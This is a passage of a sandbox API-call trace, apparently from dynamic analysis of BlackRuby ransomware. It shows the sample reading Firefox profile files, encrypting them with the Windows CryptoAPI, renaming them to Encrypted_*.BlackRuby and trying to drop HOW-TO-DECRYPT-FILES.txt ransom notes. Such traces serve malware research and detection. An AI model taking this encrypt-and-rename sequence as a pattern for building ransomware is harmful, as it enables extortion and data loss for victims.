[0054.179] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x835ec520, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x835ec520, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x287bd760, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xa00110)) returned 1 [0054.179] GetLastError () returned 0xb7 [0054.179] SetErrorMode (uMode=0x0) returned 0x1 [0054.179] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_aLM2j4yYZvWLRnf6DYayW8r28SrzibwihDzi16Y.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_alm2j4yyzvwlrnf6dyayw8r28srzibwihdzi16y.blackruby")) returned 1 [0054.179] GetLastError () returned 0xb7 [0054.180] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0054.180] GetLastError () returned 0xb7 [0054.180] SetErrorMode (uMode=0x1) returned 0x0 [0054.180] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.180] GetLastError () returned 0x5 [0054.182] SetErrorMode (uMode=0x0) returned 0x1 [0054.182] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat", lpFilePart=0x0) returned 0x58 [0054.182] GetLastError () returned 0x5 [0054.182] SetErrorMode (uMode=0x1) returned 0x0 [0054.182] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat"), fInfoLevelId=0x0, lpFileInformation=0x1b41868 | out: lpFileInformation=0x1b41868*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb4cc880, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xcb4cc880, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xcb4cc880, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0xe02)) returned 1 [0054.182] GetLastError () returned 0x5 [0054.182] SetErrorMode (uMode=0x0) returned 0x1 [0054.183] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat", lpFilePart=0x0) returned 0x58 [0054.183] GetLastError () returned 0x5 [0054.183] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat", lpFilePart=0x0) returned 0x58 [0054.183] GetLastError () returned 0x5 [0054.183] SetErrorMode (uMode=0x1) returned 0x0 [0054.183] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.183] GetLastError () returned 0x0 [0054.183] GetFileType (hFile=0x184) returned 0x1 [0054.183] SetErrorMode (uMode=0x0) returned 0x1 [0054.183] GetFileType (hFile=0x184) returned 0x1 [0054.183] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0xe02 [0054.183] GetLastError () returned 0x0 [0054.183] ReadFile (in: hFile=0x184, lpBuffer=0x1b446f4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1b446f4*, lpNumberOfBytesRead=0x18eb68*=0xe02, lpOverlapped=0x0) returned 1 [0054.194] GetLastError () returned 0x0 [0054.194] CloseHandle (hObject=0x184) returned 1 [0054.194] GetLastError () returned 0x0 [0054.194] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat", lpFilePart=0x0) returned 0x58 [0054.194] GetLastError () returned 0x0 [0054.194] SetErrorMode (uMode=0x1) returned 0x0 [0054.194] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb4cc880, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xcb4cc880, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xcb4cc880, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0xe02)) returned 1 [0054.194] GetLastError () returned 0x0 [0054.194] SetErrorMode (uMode=0x0) returned 0x1 [0054.194] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c708) returned 1 [0054.194] GetLastError () returned 0x0 [0054.282] CryptImportKey (in: hProv=0x37c708, pbData=0x1ba08fc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360ce0) returned 1 [0054.282] GetLastError () returned 0x0 [0054.282] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.282] GetLastError () returned 0x0 [0054.287] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.287] GetLastError () returned 0x0 [0054.287] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360de0) returned 1 [0054.287] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.287] GetLastError () returned 0x0 [0054.287] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1bcd948*=0x1, dwFlags=0x0) returned 1 [0054.287] GetLastError () returned 0x0 [0054.287] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1bcd914, dwFlags=0x0) returned 1 [0054.287] GetLastError () returned 0x0 [0054.287] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bcd990*, pdwDataLen=0x18eb58*=0xf00, dwBufLen=0xf00 | out: pbData=0x1bcd990*, pdwDataLen=0x18eb58*=0xf00) returned 1 [0054.288] GetLastError () returned 0x0 [0054.288] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bcf7bc*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1bcf7bc*, pdwDataLen=0x18eb70*=0x10) returned 1 [0054.288] GetLastError () returned 0x0 [0054.288] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bcf7ec*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1bcf7ec*, pdwDataLen=0x18eb78*=0x10) returned 1 [0054.288] GetLastError () returned 0x0 [0054.288] CryptDestroyKey (hKey=0x360ce0) returned 1 [0054.288] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0054.288] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0054.288] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat", lpFilePart=0x0) returned 0x58 [0054.288] GetLastError () returned 0x0 [0054.288] SetErrorMode (uMode=0x1) returned 0x0 [0054.288] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.289] GetLastError () returned 0xb7 [0054.289] GetFileType (hFile=0x184) returned 0x1 [0054.289] SetErrorMode (uMode=0x0) returned 0x1 [0054.289] GetFileType (hFile=0x184) returned 0x1 [0054.290] CloseHandle (hObject=0x184) returned 1 [0054.290] GetLastError () returned 0xb7 [0054.290] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat", lpFilePart=0x0) returned 0x58 [0054.290] GetLastError () returned 0xb7 [0054.290] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_R4PubEmQsSRDlr9FTjEPNAVaDvaETTbp8dV3hD9D2Ce.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_R4PubEmQsSRDlr9FTjEPNAVaDvaETTbp8dV3hD9D2Ce.BlackRuby", lpFilePart=0x0) returned 0x8a [0054.290] GetLastError () returned 0xb7 [0054.290] SetErrorMode (uMode=0x1) returned 0x0 [0054.290] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb4cc880, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xcb4cc880, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0x288c8100, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xf10)) returned 1 [0054.290] GetLastError () returned 0xb7 [0054.290] SetErrorMode (uMode=0x0) returned 0x1 [0054.290] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\pluginreg.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_R4PubEmQsSRDlr9FTjEPNAVaDvaETTbp8dV3hD9D2Ce.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_r4pubemqssrdlr9ftjepnavadvaettbp8dv3hd9d2ce.blackruby")) returned 1 [0054.291] GetLastError () returned 0xb7 [0054.292] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0054.292] GetLastError () returned 0xb7 [0054.292] SetErrorMode (uMode=0x1) returned 0x0 [0054.292] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.292] GetLastError () returned 0x5 [0054.294] SetErrorMode (uMode=0x0) returned 0x1 [0054.294] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js", lpFilePart=0x0) returned 0x53 [0054.294] GetLastError () returned 0x5 [0054.294] SetErrorMode (uMode=0x1) returned 0x0 [0054.294] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js"), fInfoLevelId=0x0, lpFileInformation=0x1bf0b50 | out: lpFileInformation=0x1bf0b50*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe7e820, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xc06da00, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xc06da00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x11e4)) returned 1 [0054.295] GetLastError () returned 0x5 [0054.295] SetErrorMode (uMode=0x0) returned 0x1 [0054.295] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js", lpFilePart=0x0) returned 0x53 [0054.295] GetLastError () returned 0x5 [0054.295] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js", lpFilePart=0x0) returned 0x53 [0054.295] GetLastError () returned 0x5 [0054.295] SetErrorMode (uMode=0x1) returned 0x0 [0054.295] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.295] GetLastError () returned 0x0 [0054.295] GetFileType (hFile=0x184) returned 0x1 [0054.295] SetErrorMode (uMode=0x0) returned 0x1 [0054.295] GetFileType (hFile=0x184) returned 0x1 [0054.295] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x11e4 [0054.295] GetLastError () returned 0x0 [0054.295] ReadFile (in: hFile=0x184, lpBuffer=0x1bf2958, nNumberOfBytesToRead=0x11e4, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1bf2958*, lpNumberOfBytesRead=0x18eb68*=0x11e4, lpOverlapped=0x0) returned 1 [0054.311] GetLastError () returned 0x0 [0054.311] CloseHandle (hObject=0x184) returned 1 [0054.311] GetLastError () returned 0x0 [0054.311] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js", lpFilePart=0x0) returned 0x53 [0054.311] GetLastError () returned 0x0 [0054.311] SetErrorMode (uMode=0x1) returned 0x0 [0054.311] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe7e820, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xc06da00, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xc06da00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x11e4)) returned 1 [0054.312] GetLastError () returned 0x0 [0054.312] SetErrorMode (uMode=0x0) returned 0x1 [0054.312] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c818) returned 1 [0054.312] GetLastError () returned 0x0 [0054.349] CryptImportKey (in: hProv=0x37c818, pbData=0x1c4f104, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360b60) returned 1 [0054.349] GetLastError () returned 0x0 [0054.349] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.349] GetLastError () returned 0x0 [0054.355] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.355] GetLastError () returned 0x0 [0054.355] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360a20) returned 1 [0054.356] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.356] GetLastError () returned 0x0 [0054.356] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1c7c150*=0x1, dwFlags=0x0) returned 1 [0054.356] GetLastError () returned 0x0 [0054.356] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1c7c11c, dwFlags=0x0) returned 1 [0054.356] GetLastError () returned 0x0 [0054.356] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c7c198*, pdwDataLen=0x18eb58*=0x12e0, dwBufLen=0x12e0 | out: pbData=0x1c7c198*, pdwDataLen=0x18eb58*=0x12e0) returned 1 [0054.356] GetLastError () returned 0x0 [0054.356] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c7e784*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1c7e784*, pdwDataLen=0x18eb70*=0x10) returned 1 [0054.356] GetLastError () returned 0x0 [0054.356] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c7e7b4*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1c7e7b4*, pdwDataLen=0x18eb78*=0x10) returned 1 [0054.356] GetLastError () returned 0x0 [0054.356] CryptDestroyKey (hKey=0x360b60) returned 1 [0054.356] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0054.356] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0054.356] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js", lpFilePart=0x0) returned 0x53 [0054.356] GetLastError () returned 0x0 [0054.356] SetErrorMode (uMode=0x1) returned 0x0 [0054.356] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.357] GetLastError () returned 0xb7 [0054.357] GetFileType (hFile=0x184) returned 0x1 [0054.357] SetErrorMode (uMode=0x0) returned 0x1 [0054.357] GetFileType (hFile=0x184) returned 0x1 [0054.358] CloseHandle (hObject=0x184) returned 1 [0054.358] GetLastError () returned 0xb7 [0054.358] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js", lpFilePart=0x0) returned 0x53 [0054.358] GetLastError () returned 0xb7 [0054.358] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_QFg8q5Tu5lX0TAD44fQt8aaGJd8LGiJfrhEKzs3tIZ.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_QFg8q5Tu5lX0TAD44fQt8aaGJd8LGiJfrhEKzs3tIZ.BlackRuby", lpFilePart=0x0) returned 0x89 [0054.358] GetLastError () returned 0xb7 [0054.358] SetErrorMode (uMode=0x1) returned 0x0 [0054.358] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe7e820, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xc06da00, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x289867e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x12f0)) returned 1 [0054.358] GetLastError () returned 0xb7 [0054.358] SetErrorMode (uMode=0x0) returned 0x1 [0054.359] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\prefs.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_QFg8q5Tu5lX0TAD44fQt8aaGJd8LGiJfrhEKzs3tIZ.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_qfg8q5tu5lx0tad44fqt8aagjd8lgijfrhekzs3tiz.blackruby")) returned 1 [0054.359] GetLastError () returned 0xb7 [0054.359] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0054.359] GetLastError () returned 0xb7 [0054.359] SetErrorMode (uMode=0x1) returned 0x0 [0054.359] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.359] GetLastError () returned 0x5 [0054.360] SetErrorMode (uMode=0x0) returned 0x1 [0054.361] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\search.json", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\search.json", lpFilePart=0x0) returned 0x56 [0054.361] GetLastError () returned 0x5 [0054.361] SetErrorMode (uMode=0x1) returned 0x0 [0054.361] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\search.json" (normalized: 